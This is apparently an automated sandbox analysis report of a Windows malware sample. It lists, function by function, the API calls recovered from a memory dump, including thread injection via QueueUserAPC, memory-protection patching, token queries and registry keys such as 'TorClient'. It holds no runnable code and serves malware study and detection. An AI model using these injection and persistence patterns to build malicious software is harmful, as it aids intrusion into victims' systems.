Part of subcall function 009B3CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,009CF65A), ref: 009B3CCA

Part of subcall function 009C33D3: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,009B4655,00000000), ref: 009C33EE
Part of subcall function 009C33D3: IsWow64Process.KERNEL32(?,?,?,?,?,?,009B4655,00000000), ref: 009C33FF
Part of subcall function 009C33D3: FindCloseChangeNotification.KERNELBASE(?,?,?,?,009B4655,00000000), ref: 009C3412

Strings

t, xrefs: 009BA0F6

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateFileModuleOpenThreadTimeVirtual$AllocChangeCloseCurrentEventExitFindFreeHandleHeaderHeapImageInformationNameNotificationQuerySystemUserVersionWow64memcpy
String ID: t
API String ID: 1973333951-2238339752
Opcode ID: 95219811988ff99bc8a9ff4755d9a78e2e2ab95303682762c9c38aed3d42fb00
Instruction ID: 9ea6d543ac1edf146790ab36fb38206c90f0bab892c91b7cac709b80a9d356bd
Opcode Fuzzy Hash: 95219811988ff99bc8a9ff4755d9a78e2e2ab95303682762c9c38aed3d42fb00
Instruction Fuzzy Hash: C631F432985118AFCB21FF68DD84AFEBBB8EB91360F10412AE542EB111DA308D84D761

Uniqueness

Uniqueness Score: -1.00%

Function 009D16A5, Relevance: 12.1, APIs: 8, Instructions: 114stringCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,009DE0D8,00000000), ref: 009D16D3
StrRChrA.SHLWAPI(062885A8,00000000,0000005C,00000000,00000001,00000000,009DE0B4,00000000,?), ref: 009D16E8
_strupr.NTDLL ref: 009D16FE
lstrlen.KERNEL32(062885A8), ref: 009D1706
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,009DE0B4,00000000,?), ref: 009D1786
RtlAddVectoredExceptionHandler.NTDLL(00000000,009C46B0), ref: 009D17AD
GetLastError.KERNEL32(?), ref: 009D17C7
RtlRemoveVectoredExceptionHandler.NTDLL(00CE2668), ref: 009D17DD

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
String ID:
API String ID: 1098824789-0
Opcode ID: f2c2d2048418b3d578420644f86540c1392a54d2ace965dc9394db0eb889e829
Instruction ID: ec540859b2e026af1bc45cfa8d816f5ddbde7af754577c2b990d118284ad62c3
Opcode Fuzzy Hash: f2c2d2048418b3d578420644f86540c1392a54d2ace965dc9394db0eb889e829
Instruction Fuzzy Hash: D931E5739DD214AFEB10BF78DC85A6E77A8A704750B04442BF501D72A1DAB08DC4DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009BACD5, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,00000000), ref: 009BAD1C
NtOpenProcessToken.NTDLL(00000000,00000008,00000001), ref: 009BAD2F
NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 009BAD4B

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 009BAD68
memcpy.NTDLL(00000000,00000000,0000001C), ref: 009BAD75
NtClose.NTDLL(00000001), ref: 009BAD87
NtClose.NTDLL(00000000), ref: 009BAD91

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 3e0eeac962bdce83e93aa1d790679be330481c4221a0dd35166d6200e5baf505
Instruction ID: 94a5b3c7f9c5bc75a56ad565e6542443421f44b161856941a3a2fc13a336e307
Opcode Fuzzy Hash: 3e0eeac962bdce83e93aa1d790679be330481c4221a0dd35166d6200e5baf505
Instruction Fuzzy Hash: 332139B2950218BFDB019F95CD45EDEBFBDFF48790F104026FA00E6160D7719A849BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C6CBC, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 009C6CE1
NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 009C6CFD

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

Part of subcall function 009CAC94: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 009CACBD
Part of subcall function 009CAC94: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,009C6D3E,00000000,00000000,00000028,00000100), ref: 009CACDF

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000000,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 009C6E67

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
String ID:
API String ID: 3547194813-0
Opcode ID: ce24f352ffc12bfc4827a1792e55d79170a04e7f456d122d2a4184d5df80c222
Instruction ID: fed7be72462beb164714c75dbff41415917e0a5ffb6b91e337f6901d9e8fd344
Opcode Fuzzy Hash: ce24f352ffc12bfc4827a1792e55d79170a04e7f456d122d2a4184d5df80c222
Instruction Fuzzy Hash: E7613B75E0021AAFDB14DFA8C880BAEBBB8FF48304F00445DE919E7291D774E955CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009B7E14, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009B7E28
GetProcAddress.KERNEL32(6F57775A), ref: 009B7E50
NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,?,?,00001000,00000000), ref: 009B7E6E

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AddressInformationProcProcess64QueryWow64memset
String ID:
API String ID: 2968673968-0
Opcode ID: 02247de2c1916ed4595a7bab5e2c48b199f0914e4183c0d18739c34f2d6e7024
Instruction ID: f168930684eb2d3038d454f84e6e6daa3991c54defcddc4dc71be34c7994b787
Opcode Fuzzy Hash: 02247de2c1916ed4595a7bab5e2c48b199f0914e4183c0d18739c34f2d6e7024
Instruction Fuzzy Hash: 7111A331A19119AFDB00DB94DD09FA977BDBF84710F044165E904EB2A1D7B0ED45C760

Uniqueness

Uniqueness Score: -1.00%

Function 009CAC94, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 009CACBD
NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,009C6D3E,00000000,00000000,00000028,00000100), ref: 009CACDF

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: 73530cd199a5f1ed86a30e800d4885557d84ea7f41fdd598e6a5aedf141d6aa5
Instruction ID: 1445d88cefb1c8fedc8e372b5424ce82878f7d6419217fb6f03ea34c13b53050
Opcode Fuzzy Hash: 73530cd199a5f1ed86a30e800d4885557d84ea7f41fdd598e6a5aedf141d6aa5
Instruction Fuzzy Hash: 3AF0447295810AFFCB01DF8ADC84C9ABBBAFB94340B00401AF550D7230D6B0E991EB21

Uniqueness

Uniqueness Score: -1.00%

Function 009CCD7A, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,009DE240), ref: 009CCD91

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 55378a04e3013dfd93183d3f1f0acd6bc717a918619cc52cab848b2c074a15d0
Instruction ID: e103bf57991195fb0c636da80fc8b32a41c5727ddf78257bad13ebb2afa90f18
Opcode Fuzzy Hash: 55378a04e3013dfd93183d3f1f0acd6bc717a918619cc52cab848b2c074a15d0
Instruction Fuzzy Hash: F5F09AB1B001189BCB20DA59C884EDBBFACEB04750700402AE90ADB2A0D230ED41CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 009BA87A, Relevance: 22.6, APIs: 15, Instructions: 130memorysynchronizationCOMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,009D25B8), ref: 009BA8A3
RtlDeleteCriticalSection.NTDLL(009DE220), ref: 009BA8D6
RtlDeleteCriticalSection.NTDLL(009DE240), ref: 009BA8DD
CloseHandle.KERNEL32(?,?,009D25B8), ref: 009BA90C
ReleaseMutex.KERNEL32(00000234,00000000,?,?,?,009D25B8), ref: 009BA91D
CloseHandle.KERNEL32(?,?,009D25B8), ref: 009BA929
ResetEvent.KERNEL32(00000000,00000000,?,?,?,009D25B8), ref: 009BA935
CloseHandle.KERNEL32(?,?,009D25B8), ref: 009BA941
SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,009D25B8), ref: 009BA947
SleepEx.KERNEL32(00000064,00000001,?,?,009D25B8), ref: 009BA95B
HeapFree.KERNEL32(00000000,00000000,?,?,009D25B8), ref: 009BA97E
RtlRemoveVectoredExceptionHandler.NTDLL(00CE2668), ref: 009BA9B7
SleepEx.KERNEL32(00000064,00000001,?,?,009D25B8), ref: 009BA9D3
FindCloseChangeNotification.KERNELBASE(06288418,?,?,009D25B8), ref: 009BA9FA
LocalFree.KERNEL32(?,?,009D25B8), ref: 009BAA0A

Part of subcall function 009C63E9: GetVersion.KERNEL32(?,00000000,747DF720,?,009BA894,00000000,?,?,?,009D25B8), ref: 009C640D
Part of subcall function 009C63E9: GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,009BA894,00000000,?,?,?,009D25B8), ref: 009C6421
Part of subcall function 009C63E9: GetProcAddress.KERNEL32(00000000), ref: 009C6428

Part of subcall function 009B9882: RtlEnterCriticalSection.NTDLL(009DE240), ref: 009B988C
Part of subcall function 009B9882: RtlLeaveCriticalSection.NTDLL(009DE240), ref: 009B98C8

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSectionSleep$DeleteFree$AddressChangeEnterEventExceptionFindHandlerHeapLeaveLocalModuleMutexNotificationProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 3271069005-0
Opcode ID: a8ef9b73fe3f3a5ef9032eed9404a1f7998e55d7f66ef5ae4cd6be3cabe2a1f9
Instruction ID: 3fcaf0ad689d23e4af8ae150c2ec736a570656b5da72592ef28d9c2908dd6802
Opcode Fuzzy Hash: a8ef9b73fe3f3a5ef9032eed9404a1f7998e55d7f66ef5ae4cd6be3cabe2a1f9
Instruction Fuzzy Hash: 2841A531AAE2059FD720BF65EEC5B6937A9A740320719042BF204DB170CBB19CC4FB62

Uniqueness

Uniqueness Score: -1.00%

Function 009BEC30, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000,?,00000000,009BB275,?,?), ref: 009BEC7D
VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000,?,00000000,009BB275), ref: 009BEC8F
lstrcpy.KERNEL32(00000000,?), ref: 009BEC9E
VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000,?,00000000,009BB275), ref: 009BECAF
VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,009DA4F8,00000018,009B7458,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000), ref: 009BECE5
VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000,?,00000000,009BB275), ref: 009BED00
VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,009DA4F8,00000018,009B7458,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000), ref: 009BED15
VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,009DA4F8,00000018,009B7458,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000), ref: 009BED42
VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000,?,00000000,009BB275), ref: 009BED5C
GetLastError.KERNEL32(?,00000000,?,009B6222,009DD4E4,?,?,00000004,00000000,?,00000000,009BB275,?,?), ref: 009BED63

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: 056420b62cee22efa5e2364d2db99fda62fbd8982a8b2494c6a74a764c9d9e8c
Instruction ID: 1032deac1eee7a2a03e653e749cd1d3b11dfc334feed615482d5ae78f3441002
Opcode Fuzzy Hash: 056420b62cee22efa5e2364d2db99fda62fbd8982a8b2494c6a74a764c9d9e8c
Instruction Fuzzy Hash: BF414F71944709AFDB219FA4CD44EEBBBBCFF48320F008A19E655A66A1D774E805DF20

Uniqueness

Uniqueness Score: -1.00%

Function 009B1000, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D5277: VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275), ref: 009D529C
Part of subcall function 009D5277: GetLastError.KERNEL32(?,00000000,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275,?,?), ref: 009D52A4
Part of subcall function 009D5277: VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275,?,?), ref: 009D52BB
Part of subcall function 009D5277: VirtualProtect.KERNEL32(?,00000000,-392CC87E,00000004,?,00000000,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275,?), ref: 009D52E0

GetLastError.KERNEL32(00000000,00000004,009DD518,00000000,?,00000000,00000002,009DA568,0000001C,009C5176,00000002,?,00000001,00000000,009DD514,00000000), ref: 009B1159

Part of subcall function 009D24E0: lstrlen.KERNEL32(6AD68BFC,009B619F,?,009B619F,00000004), ref: 009D2518
Part of subcall function 009D24E0: lstrcpy.KERNEL32(00000000,6AD68BFC), ref: 009D252F
Part of subcall function 009D24E0: StrChrA.SHLWAPI(00000000,0000002E,?,009B619F,00000004), ref: 009D2538
Part of subcall function 009D24E0: GetModuleHandleA.KERNEL32(00000000,?,009B619F,00000004), ref: 009D2556

VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,6AD68BFC,?,00000004,00000000,00000004,009DD518,00000000,?), ref: 009B10D7
VirtualProtect.KERNELBASE(00000000,00000004,009DD518,009DD518,?,00000004,00000000,00000004,009DD518,00000000,?,00000000,00000002,009DA568,0000001C,009C5176), ref: 009B10F2
RtlEnterCriticalSection.NTDLL(009DE240), ref: 009B1116
RtlLeaveCriticalSection.NTDLL(009DE240), ref: 009B1134

Part of subcall function 009D5277: SetLastError.KERNEL32(00000000,?,00000000,00000000,?,?,009B619F,00000004,00000000,?,00000000,009BB275,?,?), ref: 009D52E9

Strings

, xrefs: 009B10C6

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-3916222277
Opcode ID: 221f23c6ea8775ff1b051a10bf168b813efeb22c10bd2e4f53fe3bf453be8201
Instruction ID: 0ce0f87ab5a8ceda41943c423355bfc3087847c2a1f4a894936297f086d35996
Opcode Fuzzy Hash: 221f23c6ea8775ff1b051a10bf168b813efeb22c10bd2e4f53fe3bf453be8201
Instruction Fuzzy Hash: B4415E71904609EFDB11DF99C945ADEBBB8FF48320F04821AE915AB291D774E990CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C9D35, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009C6CBC: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 009C6CE1
Part of subcall function 009C6CBC: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 009C6CFD

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 009C9D6E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 009C9E59

Part of subcall function 009C6CBC: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000000,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 009C6E67

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 009C9DA4
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 009C9DB0
lstrcmpi.KERNEL32(?,00000000), ref: 009C9DED
StrChrA.SHLWAPI(?,0000002E), ref: 009C9DF6
lstrcmpi.KERNEL32(?,00000000), ref: 009C9E08

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
String ID:
API String ID: 3901270786-0
Opcode ID: 0181aefc994a82b58959d18ecc873872dd4a36c39e2b27636c64f9bb236c0194
Instruction ID: cd94c2ce9bf741c4b25a55c8183910edabed576884868e41fd539a40aa7d7c20
Opcode Fuzzy Hash: 0181aefc994a82b58959d18ecc873872dd4a36c39e2b27636c64f9bb236c0194
Instruction Fuzzy Hash: C0316A71949311ABD321CF11C848F6BBBE8FF99B54F10091DF989A7281C774E944CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 009B8554, Relevance: 10.6, APIs: 7, Instructions: 80sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 009C4F76: memset.NTDLL ref: 009C4F80

OpenEventA.KERNEL32(00000002,00000000,009DE130,?,00000000,00000000,?,009C15E7), ref: 009B85E4
SetEvent.KERNEL32(00000000,?,009C15E7), ref: 009B85F1
Sleep.KERNEL32(00000BB8,?,009C15E7), ref: 009B85FC
ResetEvent.KERNEL32(00000000,?,009C15E7), ref: 009B8603
CloseHandle.KERNEL32(00000000,?,009C15E7), ref: 009B860A
GetShellWindow.USER32 ref: 009B8615
GetWindowThreadProcessId.USER32(00000000), ref: 009B861C

Part of subcall function 009BF792: RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?,006E0049,System,004F0053,00000000), ref: 009BF7E8
Part of subcall function 009BF792: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000004), ref: 009BF804
Part of subcall function 009BF792: RegCloseKey.KERNELBASE(?), ref: 009BF815

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Event$CloseOpenWindow$HandleProcessQueryResetShellSleepThreadValuememset
String ID:
API String ID: 937394351-0
Opcode ID: 2ea365d80372c5f54f14bf6bdf6568df639d43a77c4b9685803b9438aaf74eff
Instruction ID: f96ed21b01da384de41d1294f4be5a195a2088a3f25289f890706c6948f54016
Opcode Fuzzy Hash: 2ea365d80372c5f54f14bf6bdf6568df639d43a77c4b9685803b9438aaf74eff
Instruction Fuzzy Hash: 6621C6322AE214FBC7217BA5DD49EAB776DEBC9760B04440AF50587252CF349841E772

Uniqueness

Uniqueness Score: -1.00%

Function 009CE866, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C6AB9: lstrlen.KERNEL32(?,00000000,009CEC1E,00000027,009DE0D4,?,00000000,?,?,009CEC1E,Local\,00000001,?,009D0C37,00000000,00000000), ref: 009C6AEF
Part of subcall function 009C6AB9: lstrcpy.KERNEL32(00000000,00000000), ref: 009C6B13
Part of subcall function 009C6AB9: lstrcat.KERNEL32(00000000,00000000), ref: 009C6B1B

RegOpenKeyExA.KERNELBASE(009C4F98,00000000,00000000,00020119,80000001,00000000,Software\AppDataLow\Software\Microsoft\,00000000,?,009DE130,009C4F98,009C15E7,80000001,?,009C15E7), ref: 009CE89F
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,?,009C15E7), ref: 009CE8B3
RegCloseKey.KERNELBASE(?,?,Client32,?,?,?,009C15E7), ref: 009CE8FC

Strings

Client32, xrefs: 009CE8C1
Software\AppDataLow\Software\Microsoft\, xrefs: 009CE874
Client64, xrefs: 009CE8E5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID: Client32$Client64$Software\AppDataLow\Software\Microsoft\
API String ID: 4131162436-710576342
Opcode ID: 7dcb304425b4351e85973564d993571970e4bff28b4b8cc69afa61327ca4fda6
Instruction ID: 525d7eef0dad5c3f8e3473f39567a2f351d28af6d36c867dbc54b498e68be8c1
Opcode Fuzzy Hash: 7dcb304425b4351e85973564d993571970e4bff28b4b8cc69afa61327ca4fda6
Instruction Fuzzy Hash: 2E11BF71E4021CBFDB10AFE5DCC5EAFBBBCEA84318B00403AF901A6151D3709E449BA1

Uniqueness

Uniqueness Score: -1.00%

Function 009C18D2, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009C18F5

Part of subcall function 009C33D3: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,009B4655,00000000), ref: 009C33EE
Part of subcall function 009C33D3: IsWow64Process.KERNEL32(?,?,?,?,?,?,009B4655,00000000), ref: 009C33FF
Part of subcall function 009C33D3: FindCloseChangeNotification.KERNELBASE(?,?,?,?,009B4655,00000000), ref: 009C3412

ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,74784EE0,00000000), ref: 009C19AF
WaitForSingleObject.KERNEL32(00000064), ref: 009C19BD
SuspendThread.KERNEL32(00000004), ref: 009C19D0

Part of subcall function 009C7579: memset.NTDLL ref: 009C783B

ResumeThread.KERNELBASE(00000004), ref: 009C1A53

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Thread$ProcessResumememset$ChangeCloseFindNotificationObjectOpenSingleSuspendWaitWow64
String ID:
API String ID: 2336522172-0
Opcode ID: 76db2e661633e85aa63d9c4fbcfaabef8ac5589aa172f73925b5aeba9e55dffa
Instruction ID: 7824e38e8185a4df899fff38539b556f506d5c05d0a815cb2bf37663c9dfa330
Opcode Fuzzy Hash: 76db2e661633e85aa63d9c4fbcfaabef8ac5589aa172f73925b5aeba9e55dffa
Instruction Fuzzy Hash: 3441AB71D01208AFDB11AF94CC84FEE7BB9EF45340F14842AF905A6162DB30DE94DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 009BFFED, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,009DD514,?,009DA578,00000018,009C3B8C,00000000,00000002,009DD518,00000000,009DD514,00000000), ref: 009C0030
VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,00000000,?,?,?,009DD514,?,009DA578,00000018,009C3B8C), ref: 009C00BB
RtlEnterCriticalSection.NTDLL(009DE240), ref: 009C00E3
RtlLeaveCriticalSection.NTDLL(009DE240), ref: 009C0101

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 0c7dfd9c033f228d62fadd540c3180eff83cd6cc1adaa960b2c79988c1a34914
Instruction ID: 5e74fb1a241b20e0617c4192c09dbb4967dfaa4ee34f748cc5d24cccc23cd89f
Opcode Fuzzy Hash: 0c7dfd9c033f228d62fadd540c3180eff83cd6cc1adaa960b2c79988c1a34914
Instruction Fuzzy Hash: 31415970944605EFCB11DFA5C880AAEBBF8FF88310F14851AE515AB261D774AA81DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009CC0AB, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,009B402D), ref: 009CC0C2
QueueUserAPC.KERNELBASE(?,00000000,?,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009CC0D7
GetLastError.KERNEL32(00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009CC0E2
TerminateThread.KERNEL32(00000000,00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009CC0EC
CloseHandle.KERNEL32(00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009CC0F3
SetLastError.KERNEL32(00000000,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009CC0FC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 57e7e2953640c0b1031caab01fcfa4536ae7923e7a619c0ec7a2001a395fc9a9
Instruction ID: 927dd37b779a3579c633e78c629fbe75a3afc1f2547eba0da042356072a505d7
Opcode Fuzzy Hash: 57e7e2953640c0b1031caab01fcfa4536ae7923e7a619c0ec7a2001a395fc9a9
Instruction Fuzzy Hash: FEF0823259E620BBC2215F61EC48F9B7F69FB09721F000406F70591162CB304899ABA2

Uniqueness

Uniqueness Score: -1.00%

Function 009CE65F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memcpy.NTDLL(009DE130,74784D40,00000018,00000001,00000000,74784D40,009C7CD1,?,?), ref: 009CE675
GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,00000000,74784D40,009C7CD1,?,?), ref: 009CE69A
GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 009CE6AA

Strings

NTDLL.DLL, xrefs: 009CE683
KERNEL32.DLL, xrefs: 009CE6A5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$memcpy
String ID: KERNEL32.DLL$NTDLL.DLL
API String ID: 1864057842-633099880
Opcode ID: 79c900331eb6d64912d95fab0be1b87c2cb1073ac4e521b94362b8b25d632f98
Instruction ID: 21f4e031ae9d889a84cf5c292e39b1e4544aff97f439987b42a924c8e60829ac
Opcode Fuzzy Hash: 79c900331eb6d64912d95fab0be1b87c2cb1073ac4e521b94362b8b25d632f98
Instruction Fuzzy Hash: D501D632EAD3019BE710AF55EE81F5577D8BBA4710F14053FF146871A0D6B05484DB53

Uniqueness

Uniqueness Score: -1.00%

Function 009C672D, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009B810A: RegCreateKeyA.ADVAPI32(80000001,06288900,?), ref: 009B811F
Part of subcall function 009B810A: lstrlen.KERNEL32(06288900,00000000,00000000,?,?,009C79A9,00000000,?), ref: 009B814D

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,009B1CDF,00000000,00000000,?,?,00000000,?,?,?,009B1CDF,TorClient), ref: 009C6765
RtlAllocateHeap.NTDLL(00000000,009B1CDF), ref: 009C6779
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,009B1CDF,?,?,?,009B1CDF,TorClient,?,?), ref: 009C6793
HeapFree.KERNEL32(00000000,009B1CDF,?,?,?,009B1CDF,TorClient,?,?), ref: 009C67AF
RegCloseKey.KERNELBASE(?,?,?,?,009B1CDF,TorClient,?,?), ref: 009C67BD

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: 5b121a6d3ef9ac41f52f48203840b51947d5c092297b6b1a0d7914f65f2f8249
Instruction ID: 4b2682dc0dc6200ce249de8517c1ddfa68543e1b8d8ea6975839cf5213fe8af3
